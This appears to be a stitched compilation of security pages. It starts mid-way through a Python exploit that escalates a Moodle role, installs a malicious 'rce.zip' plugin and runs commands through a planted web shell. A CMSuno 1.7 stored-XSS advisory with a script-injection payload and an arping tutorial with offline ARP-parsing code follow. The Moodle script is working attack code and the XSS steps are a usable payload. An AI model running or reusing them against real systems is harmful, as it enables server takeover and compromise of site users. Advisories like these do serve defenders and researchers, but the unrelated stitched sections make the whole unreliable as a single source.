ewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry','1'),('mod/data:viewrating','1'),('mod/data:writeentry','1'),('mod/feedback:complete','1'),('mod/feedback:createprivatetemplate','1'),('mod/feedback:createpublictemplate','1'),('mod/feedback:deletesubmissions','1'),('mod/feedback:deletetemplate','1'),('mod/feedback:edititems','1'),('mod/feedback:mapcourse','1'),('mod/feedback:receivemail','1'),('mod/feedback:view','1'),('mod/feedback:viewanalysepage','1'),('mod/feedback:viewreports','1'),('mod/folder:managefiles','1'),('mod/folder:view','1'),('mod/forum:addnews','1'),('mod/forum:addquestion','1'),('mod/forum:allowforcesubscribe','1'),('mod/forum:canoverridecutoff','1'),('mod/forum:canoverridediscussionlock','1'),('mod/forum:canposttomygroups','1'),('mod/forum:cantogglefavourite','1'),('mod/forum:createattachment','1'),('mod/forum:deleteanypost','1'),('mod/forum:deleteownpost','1'),('mod/forum:editanypost','1'),('mod/forum:exportdiscussion','1'),('mod/forum:exportforum','1'),('mod/forum:exportownpost','1'),('mod/forum:exportpost','1'),('mod/forum:grade','1'),('mod/forum:managesubscriptions','1'),('mod/forum:movediscussions','1'),('mod/forum:pindiscussions','1'),('mod/forum:postprivatereply','1'),('mod/forum:postwithoutthrottling','1'),('mod/forum:rate','1'),('mod/forum:readprivatereplies','1'),('mod/forum:replynews','1'),('mod/forum:replypost','1'),('mod/forum:splitdiscussions','1'),('mod/forum:startdiscussion','1'),('mod/forum:viewallratings','1'),('mod/forum:viewanyrating','1'),('mod/forum:viewdiscussion','1'),('mod/forum:viewhiddentimedposts','1'),('mod/forum:viewqandawithoutposting','1'),('mod/forum:viewrating','1'),('mod/forum:viewsubscribers','1'),('mod/glossary:approve','1'),('mod/glossary:comment','1'),('mod/glossary:export','1'),('mod/glossary:exportentry','1'),('mod/glossary:exportownentry','1'),('mod/glossary:import','1'),('mod/glossary:managecategories','1'),('mod/glossary:managecomments','1'),('mod/glossary:manageentries','1'),('
mod/glossary:rate','1'),('mod/glossary:view','1'),('mod/glossary:viewallratings','1'),('mod/glossary:viewanyrating','1'),('mod/glossary:viewrating','1'),('mod/glossary:write','1'),('mod/h5pactivity:reviewattempts','1'),('mod/h5pactivity:submit','1'),('mod/h5pactivity:view','1'),('mod/imscp:view','1'),('mod/label:view','1'),('mod/lesson:edit','1'),('mod/lesson:grade','1'),('mod/lesson:manage','1'),('mod/lesson:manageoverrides','1'),('mod/lesson:view','1'),('mod/lesson:viewreports','1'),('mod/lti:admin','1'),('mod/lti:manage','1'),('mod/lti:view','1'),('mod/page:view','1'),('mod/quiz:attempt','1'),('mod/quiz:deleteattempts','1'),('mod/quiz:emailconfirmsubmission','1'),('mod/quiz:emailnotifysubmission','1'),('mod/quiz:emailwarnoverdue','1'),('mod/quiz:grade','1'),('mod/quiz:ignoretimelimits','1'),('mod/quiz:manage','1'),('mod/quiz:manageoverrides','1'),('mod/quiz:preview','1'),('mod/quiz:regrade','1'),('mod/quiz:reviewmyattempts','1'),('mod/quiz:view','1'),('mod/quiz:viewreports','1'),('mod/resource:view','1'),('mod/scorm:deleteownresponses','1'),('mod/scorm:deleteresponses','1'),('mod/scorm:savetrack','1'),('mod/scorm:skipview','1'),('mod/scorm:viewreport','1'),('mod/scorm:viewscores','1'),('mod/survey:download','1'),('mod/survey:participate','1'),('mod/survey:readresponses','1'),('mod/url:view','1'),('mod/wiki:createpage','1'),('mod/wiki:editcomment','1'),('mod/wiki:editpage','1'),('mod/wiki:managecomment','1'),('mod/wiki:managefiles','1'),('mod/wiki:managewiki','1'),('mod/wiki:overridelock','1'),('mod/wiki:viewcomment','1'),('mod/wiki:viewpage','1'),('mod/workshop:allocate','1'),('mod/workshop:deletesubmissions','1'),('mod/workshop:editdimensions','1'),('mod/workshop:exportsubmissions','1'),('mod/workshop:ignoredeadlines','1'),('mod/workshop:manageexamples','1'),('mod/workshop:overridegrades','1'),('mod/workshop:peerassess','1'),('mod/workshop:publishsubmissions','1'),('mod/workshop:submit','1'),('mod/workshop:switchphase','1'),('mod/workshop:view','1'),('mod/worksh
op:viewallassessments','1'),('mod/workshop:viewallsubmissions','1'),('mod/workshop:viewauthornames','1'),('mod/workshop:viewauthorpublished','1'),('mod/workshop:viewpublishedsubmissions','1'),('mod/workshop:viewreviewernames','1'),('moodle/backup:backupactivity','1'),('moodle/competency:coursecompetencyconfigure','1'),('moodle/course:activityvisibility','1'),('moodle/course:ignoreavailabilityrestrictions','1'),('moodle/course:manageactivities','1'),('moodle/course:togglecompletion','1'),('moodle/course:viewhiddenactivities','1'),('moodle/h5p:deploy','1'),('moodle/h5p:setdisplayoptions','1'),('moodle/h5p:updatelibraries','1'),('moodle/site:accessallgroups','1'),('moodle/site:managecontextlocks','1'),('moodle/site:trustcontent','1'),('moodle/site:viewanonymousevents','1'),('moodle/site:viewfullnames','1'),('moodle/site:viewuseridentity','1'),('quiz/grading:viewidnumber','1'),('quiz/grading:viewstudentnames','1'),('quiz/statistics:view','1'),('quizaccess/seb:bypassseb','1'),('quizaccess/seb:manage_filemanager_sebconfigfile','1'),('quizaccess/seb:manage_seb_activateurlfiltering','1'),('quizaccess/seb:manage_seb_allowedbrowserexamkeys','1'),('quizaccess/seb:manage_seb_allowreloadinexam','1'),('quizaccess/seb:manage_seb_allowspellchecking','1'),('quizaccess/seb:manage_seb_allowuserquitseb','1'),('quizaccess/seb:manage_seb_enableaudiocontrol','1'),('quizaccess/seb:manage_seb_expressionsallowed','1'),('quizaccess/seb:manage_seb_expressionsblocked','1'),('quizaccess/seb:manage_seb_filterembeddedcontent','1'),('quizaccess/seb:manage_seb_linkquitseb','1'),('quizaccess/seb:manage_seb_muteonstartup','1'),('quizaccess/seb:manage_seb_quitpassword','1'),('quizaccess/seb:manage_seb_regexallowed','1'),('quizaccess/seb:manage_seb_regexblocked','1'),('quizaccess/seb:manage_seb_requiresafeexambrowser','1'),('quizaccess/seb:manage_seb_showkeyboardlayout','1'),('quizaccess/seb:manage_seb_showreloadbutton','1'),('quizaccess/seb:manage_seb_showsebdownloadlink','1'),('quizaccess/seb:manage_s
eb_showsebtaskbar','1'),('quizaccess/seb:manage_seb_showtime','1'),('quizaccess/seb:manage_seb_showwificontrol','1'),('quizaccess/seb:manage_seb_templateid','1'),('quizaccess/seb:manage_seb_userconfirmquit','1'),('repository/areafiles:view','1'),('repository/boxnet:view','1'),('repository/contentbank:view','1'),('repository/coursefiles:view','1'),('repository/dropbox:view','1'),('repository/equella:view','1'),('repository/filesystem:view','1'),('repository/flickr:view','1'),('repository/flickr_public:view','1'),('repository/googledocs:view','1'),('repository/local:view','1'),('repository/merlot:view','0'),('repository/nextcloud:view','1'),('repository/onedrive:view','1'),('repository/picasa:view','1'),('repository/recent:view','1'),('repository/s3:view','1'),('repository/skydrive:view','1'),('repository/upload:view','1'),('repository/url:view','1'),('repository/user:view','1'),('repository/webdav:view','1'),('repository/wikimedia:view','1'),('repository/youtube:view','1'),('block/activity_modules:addinstance','1'),('block/activity_results:addinstance','1'),('block/admin_bookmarks:addinstance','1'),('block/badges:addinstance','1'),('block/blog_menu:addinstance','1'),('block/blog_recent:addinstance','1'),('block/blog_tags:addinstance','1'),('block/calendar_month:addinstance','1'),('block/calendar_upcoming:addinstance','1'),('block/comments:addinstance','1'),('block/completionstatus:addinstance','1'),('block/course_list:addinstance','1'),('block/course_summary:addinstance','1'),('block/feedback:addinstance','1'),('block/globalsearch:addinstance','1'),('block/glossary_random:addinstance','1'),('block/html:addinstance','1'),('block/login:addinstance','1'),('block/mentees:addinstance','1'),('block/mnet_hosts:addinstance','1'),('block/myprofile:addinstance','1'),('block/navigation:addinstance','1'),('block/news_items:addinstance','1'),('block/online_users:addinstance','1'),('block/online_users:viewlist','1'),('block/private_files:addinstance','1'),('block/quiz_results:addinstance','1'),('block/recent_activity:addinstance','1'),('block/rss_client:addinstance','1'),('block/rss_client:manageanyfeeds','1'),('block/rss_client:manageownfeeds','1'),('block/search_forums:addinstance','1'),('block/section_links:addinstance','1'),('block/selfcompletion:addinstance','1'),('block/settings:addinstance','1'),('block/site_main_menu:addinstance','1'),('block/social_activities:addinstance','1'),('block/tag_flickr:addinstance','1'),('block/tag_youtube:addinstance','1'),('block/tags:addinstance','1'),('moodle/block:edit','1'),('moodle/block:view','1'),('moodle/site:manageblocks','1'),('savechanges','Save changes')]
    r = session.post(url + '/admin/roles/define.php', params=data_get, data=data_post)
    # Above we modify the description field, so if the script finds that description on the site, we are good.
    if random_desc not in r.text:
        p6.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nTrouble updating fields\n")
        exit(1)
    else:
        r = session.get(url + '/admin/search.php')
        if "Install plugins" not in r.text:
            p6.failure(Color.RED + "✘" + Color.END)
            print(Color.RED + "\nModified fields but the options to install plugins have not been enabled.")
            print(Color.RED + "- (This is weird, sometimes he does it, sometimes he doesn't!!) Try again.\n")
            exit(1)
    sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0]
    p6.success(Color.YELLOW + "✓" + Color.END)
    time.sleep(1)
    return session, sess_key

def zipb64_up(session, url, sess_key, teacher_user, course_id):
    '''
    Doing upload of zip file as base64 binary data
    * https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/
    '''
    p7 = log.progress("Uploading malicious " + Color.BLUE + ".zip" + Color.END + " file")
    r = session.get(url + '/admin/tool/installaddon/index.php')
    zipfile_id = re.findall(r'name="zipfile" id="id_zipfile" value="(.*?)"', r.text)[0]
    client_id = re.findall(r'"client_id":"(.*?)"', r.text)[0]
    # Upupup
    data_get = {"action":"upload"}
    data_post = {
        "title" : "",
        "author" : teacher_user,
        "license" : "unknown",
        "itemid" : [zipfile_id, zipfile_id],
        "accepted_types[]" : [".zip",".zip"],
        "repo_id" : course_id,
        "p" : "",
        "page" : "",
        "env" : "filepicker",
        "sesskey" : sess_key,
        "client_id" : client_id,
        "maxbytes" : "-1",
        "areamaxbytes" : "-1",
        "ctx_id" : "1",
        "savepath" : "/"
    }
    zip_b64 = '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'
    zip_file_bytes = zip_b64.encode('utf-8')
    zip_file_b64 = base64.decodebytes(zip_file_bytes)
    data_file = [('repo_upload_file', ('rce.zip', zip_file_b64, 'application/zip'))]
    r = session.post(url + '/repository/repository_ajax.php', params=data_get, data=data_post, files=data_file)
    if "rce.zip" not in r.text:
        p7.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nError uploading zip file.\n")
        exit(1)
    # Trying to load file
    data_post = {
        "sesskey" : sess_key,
        "_qf__tool_installaddon_installfromzip_form" : "1",
        "mform_showmore_id_general" : "0",
        "mform_isexpanded_id_general" : "1",
        "zipfile" : zipfile_id,
        "plugintype" : "",
        "rootdir" : "",
        "submitbutton" : "Install plugin from the ZIP file"
    }
    r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
    if "Validation successful, installation can continue" not in r.text:
        p7.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nError uploading zip file, problems on plugin install.\n")
        exit(1)
    # Confirm load
    zip_storage = re.findall(r'installzipstorage=(.*?)&', r.url)[0]
    data_post = {
        "installzipcomponent" : "block_rce",
        "installzipstorage" : zip_storage,
        "installzipconfirm" : "1",
        "sesskey" : sess_key
    }
    r = session.post(url + '/admin/tool/installaddon/index.php', data=data_post)
    if "Current release information" not in r.text:
        p7.failure(Color.RED + "✘" + Color.END)
        print(Color.RED + "\nError uploading zip file, confirmation problems.\n")
        exit(1)
    p7.success(Color.YELLOW + "✓" + Color.END)
    time.sleep(1)
    return session

def moodle_RCE(url, command):
    '''
    Remote Command Execution on system with plugin installed (malicious zip file)
    '''
    p8 = log.progress("Executing " + Color.BLUE + command + Color.END)
    time.sleep(1)
    data_get = {"cmd" : command}
    try:
        r = session.get(url + '/blocks/rce/lang/en/block_rce.php', params=data_get, timeout=3)
        p8.success(Color.YELLOW + "✓" + Color.END)
        time.sleep(1)
        print("\n" + Color.YELLOW + r.text + Color.END)
    except requests.exceptions.Timeout as e:
        p8.success(Color.YELLOW + "✓" + Color.END)
        time.sleep(1)
        pass
    print("[" + Color.YELLOW + "+" + Color.END + "]" + Color.GREEN + " Keep breaking ev3rYthiNg!!\n" + Color.END)

if __name__ == '__main__':
    args = arguments()
    session, id_user, sess_key = login(args.url, args.username, args.password, args.id_course, args.teacher_cookie)
    enrol2rce(session, args.url, args.id_manager, args.username, args.id_course, args.teacher_cookie, args.command)
-
CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 03-08-2021
# Exploit Author: splint3rsec
# Vendor Homepage: https://github.com/boiteasite
# Software Link: https://github.com/boiteasite/cmsuno
# Affected Version(s): CMSuno 1.7 (and prior)
# CVE : CVE-2021-36654

CMSuno version 1.7 and prior is vulnerable to stored cross-site scripting. The attacker must be authenticated to exploit the vulnerability. The payload is injected while updating the template's image filename; the vulnerable parameter is *tgo*.

Steps to reproduce:
1. Go to /uno.php and click on *plugins*
2. Click on *Logo*
3. Choose a random picture from your files repo, click on save and intercept the request
4. Edit the POST request to /uno/template/uno1/uno1.php by modifying the tgo parameter's value to ")}</style><script>VULN JS CODE HERE</script>
5. Forward the request and click on *publish*
6. Click on *See the website*
7. XSS
-
Title: Arping – Discovering Hosts on Computer Network
Arping is used to discover live hosts on a computer network. By scanning the IP addresses within a network segment, you can learn each address and whether the host behind it is up. Arping uses the Address Resolution Protocol (ARP) and works at layer 2 (the link layer of the OSI model) to detect hosts. Since ARP is not routable, this only applies to local networks.

User Help

arping -h
ARPing 2.22, by Thomas Habets thomas@habets.se
usage: arping [ -0aAbdDeFpPqrRuUv ] [ -w sec ] [ -W sec ] [ -S host/ip ] [ -T host/ip ] [ -s MAC ] [ -t MAC ] [ -c count ] [ -C count ] [ -i interface ] [ -m type ] [ -g group ] [ -V vlan ] [ -Q priority ] host/ip/MAC | -B
For complete usage info, use --help or check the manpage.

Parameter definition

-A: Similar to the -U parameter, but uses ARP REPLY packets instead of ARP REQUEST packets.
-b: Send Ethernet broadcast frames. Arping uses the broadcast address at the beginning and switches to the unicast address after receiving a reply.
-c: Stop after sending the specified count of ARP REQUEST packets. If the -w parameter is specified, arping waits for the same number of ARP REPLY packets until the timeout is reached.
-D: Duplicate address detection (DAD) mode, used to detect whether there is an IP address conflict; if there is no conflict, it returns 0.
-f: Exit after receiving the first response packet.
-h: Show the help page.
-I: The name of the network device used to send the ARP REQUEST packets.
-q: Quiet mode, no output is displayed.
-U: Unsolicited (gratuitous) ARP mode, used to update the entry for the local host in the ARP cache of other hosts; no response is expected.
-V: Display the version number of arping.
-w: Specify a timeout in seconds; arping exits once the specified time has elapsed, regardless of how many packets were sent or received during that period. In this case arping will not stop after sending the specified count (-c) of packets, but will wait until the timeout or until the sent packets have been answered before exiting.
-s: Set the source IP address for the ARP packets sent. If it is empty, it is chosen as follows: 1. in DAD mode (-D) it is set to 0.0.0.0; 2. in unsolicited mode (-U) it is set to the target address; 3. otherwise it is derived from the routing table.

Example

Obtain the MAC address of a destination host through its IP address:
arping -c 5 192.168.123.129

Test whether the target host is alive:
arping -c 4 -I eth0 192.168.123.192 -S 4
Send 4 probe packets. If there is a reply, the other host is alive.
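As an added illustration (not part of the original post), the following Python models the Ethernet/ARP frames that arping sends and receives, built and parsed offline with constructed MAC and IP addresses and no network access; it also recognises the DAD probe (-D, source IP 0.0.0.0) and the gratuitous ARP (-U/-A, sender equals target) forms described above, which is what a defender would match on when reviewing a packet capture.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST, ZERO_MAC = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"
def _mac(s): return bytes.fromhex(s.replace(":", ""))
def _ip(s): return bytes(int(o) for o in s.split("."))

def build_arp(op, src_mac, src_ip, dst_mac, dst_ip, eth_dst=BROADCAST):
    """Ethernet II frame carrying an ARP packet: no IP header, so it never crosses a router."""
    eth = _mac(eth_dst) + _mac(src_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # htype Ethernet, ptype IPv4, hlen 6, plen 4
    return eth + arp + _mac(src_mac) + _ip(src_ip) + _mac(dst_mac) + _ip(dst_ip)

def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    mac = lambda b: ":".join("%02x" % x for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": op, "sender_mac": mac(frame[22:28]), "sender_ip": ip(frame[28:32]),
            "target_mac": mac(frame[32:38]), "target_ip": ip(frame[38:42])}

def classify(frame):
    """Name the kind of ARP traffic a frame carries, mirroring arping's modes."""
    a = parse_arp(frame)
    if a is None:
        return "not-arp"
    if a["op"] == ARP_REQUEST and a["sender_ip"] == "0.0.0.0":
        return "dad-probe"      # arping -D: source IP left at 0.0.0.0
    if a["sender_ip"] == a["target_ip"]:
        return "gratuitous"     # arping -U / -A: host announces its own address
    return "request" if a["op"] == ARP_REQUEST else "reply"

def resolved_mac(request, reply):
    """The MAC arping reports: sender MAC of a reply whose sender IP is the IP that was asked for."""
    q, a = parse_arp(request), parse_arp(reply)
    if q and a and a["op"] == ARP_REPLY and a["sender_ip"] == q["target_ip"]:
        return a["sender_mac"]
    return None

# Constructed sample exchange (addresses are made up): "who has 192.168.123.129?" and its answer.
REQ = build_arp(ARP_REQUEST, "02:00:00:00:00:01", "192.168.123.1", ZERO_MAC, "192.168.123.129")
REPLY = build_arp(ARP_REPLY, "02:00:00:00:00:81", "192.168.123.129",
                  "02:00:00:00:00:01", "192.168.123.1", eth_dst="02:00:00:00:00:01")
DAD = build_arp(ARP_REQUEST, "02:00:00:00:00:01", "0.0.0.0", ZERO_MAC, "192.168.123.1")
GRAT = build_arp(ARP_REQUEST, "02:00:00:00:00:01", "192.168.123.1", ZERO_MAC, "192.168.123.1")
```

Calling classify on REQ, REPLY, DAD and GRAT yields "request", "reply", "dad-probe" and "gratuitous", and resolved_mac(REQ, REPLY) gives the constructed MAC 02:00:00:00:00:81, the value arping -c 5 192.168.123.129 would print for that host.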